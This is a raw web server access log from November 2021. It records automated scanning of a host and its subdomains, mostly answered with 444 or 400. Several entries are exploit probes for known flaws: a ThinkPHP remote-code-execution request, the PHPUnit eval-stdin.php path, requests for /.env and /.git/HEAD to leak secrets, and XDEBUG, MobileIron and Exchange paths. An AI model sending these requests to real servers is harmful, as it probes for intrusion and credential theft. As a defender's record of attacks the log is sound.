[17/Nov/2021:15:03:06 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:15:39:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.26.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [17/Nov/2021:15:55:29 +0000] 400 - - http localhost "-" [Client 77.83.36.32] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:16:17:21 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:16:44:31 +0000] 444 - GET https 64.22.31.253 "/cgi-bin" [Client 192.53.170.163] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Nov/2021:16:54:05 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:17:43:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.173.98] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [17/Nov/2021:19:05:55 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:19:16:53 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:20:06:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.173.98] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [17/Nov/2021:20:55:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.78] [Length 0] [Gzip -] "-" "-" [17/Nov/2021:21:30:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:22:10:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Nov/2021:22:59:20 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [17/Nov/2021:23:32:46 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 185.180.143.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Nov/2021:23:53:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Nov/2021:00:06:37 +0000] 444 - GET https localhost "/favicon.ico" [Client 109.248.6.106] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [18/Nov/2021:01:34:31 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 188.166.121.186] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:02:43:35 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:02:43:35 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:03:31:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.139.69] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:03:35:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.60] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:03:36:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.60] [Length 252] [Gzip -] "-" "-" [18/Nov/2021:03:36:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [18/Nov/2021:03:47:31 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:03:47:31 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:07:14:51 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [18/Nov/2021:07:14:52 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [18/Nov/2021:08:08:49 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:08:08:49 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:08:43:30 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Nov/2021:09:00:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [18/Nov/2021:10:28:21 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 194.127.178.31] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [18/Nov/2021:10:37:21 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 20.121.185.34] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [18/Nov/2021:10:50:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Nov/2021:11:18:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 101.36.126.176] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:11:31:39 +0000] 400 - GET https localhost "/" [Client 167.99.133.28] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:11:32:13 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Nov/2021:11:32:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.133.28] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [18/Nov/2021:12:26:13 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [18/Nov/2021:13:43:07 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Nov/2021:14:11:05 +0000] 400 - - https localhost "-" [Client 181.214.206.52] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:14:47:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 139.162.205.136] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [18/Nov/2021:15:09:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Nov/2021:15:22:00 +0000] 444 - GET https localhost "/" [Client 88.80.186.144] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:15:22:01 +0000] 444 - OPTIONS https localhost "/" [Client 88.80.186.144] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:15:22:01 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 88.80.186.144] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:15:22:02 +0000] 400 - - https localhost "-" [Client 88.80.186.144] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:15:22:07 +0000] 400 - - https localhost "-" [Client 88.80.186.144] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:15:22:07 +0000] 400 - - https localhost "-" [Client 88.80.186.144] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:15:22:08 +0000] 400 - - https localhost "-" [Client 88.80.186.144] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:15:22:09 +0000] 400 - - https localhost "-" [Client 88.80.186.144] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:15:22:09 +0000] 400 - - https localhost "-" [Client 88.80.186.144] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:15:22:10 +0000] 400 - - https localhost "-" [Client 88.80.186.144] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:15:22:45 +0000] 444 - POST https 253.31.22.64.aeneasdsl.com "/sdk" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/Portal/Portal.mwsl" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 400 - SSTP_DUPLEX_POST https 64.22.31.253 "/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/" [Client 88.80.186.144] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:15:22:45 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/.git/HEAD" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 444 - POST https 253.31.22.64.aeneasdsl.com "/scripts/WPnBr.dll" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/Portal0000.htm" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/nmaplowercheck1637248802" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 400 - POST http 253.31.22.64.aeneasdsl.com "/scripts/WPnBr.dll" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/.git/HEAD" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 400 - POST http 253.31.22.64.aeneasdsl.com "/sdk" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/Portal0000.htm" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/Portal/Portal.mwsl" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:45 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/nmaplowercheck1637248802" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/main.jsa" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/__Additional" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/main.jsa" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/docs/cplugError.html/" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/HNAP1" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/favicon.ico" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 400 - - http localhost "-" [Client 88.80.186.144] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:15:22:46 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/__Additional" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/docs/cplugError.html/" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/HNAP1" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/favicon.ico" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/default.jsp" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/pools/default/buckets" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:46 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/CSS/Miniweb.css" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/default.jsp" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/gBhK" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 444 - HEAD https 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 444 - GET https localhost "/" [Client 88.80.186.144] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:15:22:47 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/pools/default/buckets" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/CSS/Miniweb.css" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/gBhK" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 400 - HEAD http 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/pools" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:47 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/menu.cfm" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:48 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/pools" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:48 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:48 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/admin.asp" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:48 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:48 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/admin.asp" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:49 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/base.asp" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:49 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/base.asp" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:49 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/default.pl" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:50 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/default.pl" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:50 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/base.jhtml" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:51 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/base.jhtml" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:51 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/start.pl" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:51 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/start.pl" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:52 +0000] 400 - - https localhost "-" [Client 88.80.186.144] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:15:22:52 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/main.shtml" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:53 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/main.shtml" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:53 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/inicio.cfm" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:53 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/inicio.cfm" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:54 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/robots.txt" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:54 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/robots.txt" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:55 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/main.jsp" [Client 88.80.186.144] [Length 0] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:55 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/main.jsp" [Client 88.80.186.144] [Length 252] [Gzip -] "curl/7.54.0" "-" [18/Nov/2021:15:22:56 +0000] 444 - GET https localhost "/" [Client 88.80.186.144] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:15:22:56 +0000] 400 - GET http localhost "/" [Client 88.80.186.144] [Length 252] [Gzip -] "-" "-" [18/Nov/2021:15:22:57 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:15:22:57 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 88.80.186.144] [Length 252] [Gzip -] "-" "-" [18/Nov/2021:15:23:41 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [18/Nov/2021:15:23:41 +0000] 444 - HEAD https 253.31.22.64.aeneasdsl.com "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [18/Nov/2021:15:23:41 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 145.239.154.82] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [18/Nov/2021:15:23:41 +0000] 400 - HEAD http 253.31.22.64.aeneasdsl.com "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [18/Nov/2021:15:23:50 +0000] 444 - HEAD https 253.31.22.64.aeneasdsl.com "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [18/Nov/2021:15:23:50 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [18/Nov/2021:15:23:51 +0000] 400 - HEAD http 253.31.22.64.aeneasdsl.com "/" [Client 145.239.154.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [18/Nov/2021:15:23:51 +0000] 400 - GET http 253.31.22.64.aeneasdsl.com "/" [Client 145.239.154.82] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML" "-" [18/Nov/2021:15:42:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Nov/2021:16:03:18 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 195.78.54.241] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "-" [18/Nov/2021:16:07:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Nov/2021:17:10:44 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:17:19:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 206.189.10.238] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" "-" [18/Nov/2021:17:50:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Nov/2021:18:07:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Nov/2021:18:17:10 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:18:17:10 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:18:56:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" 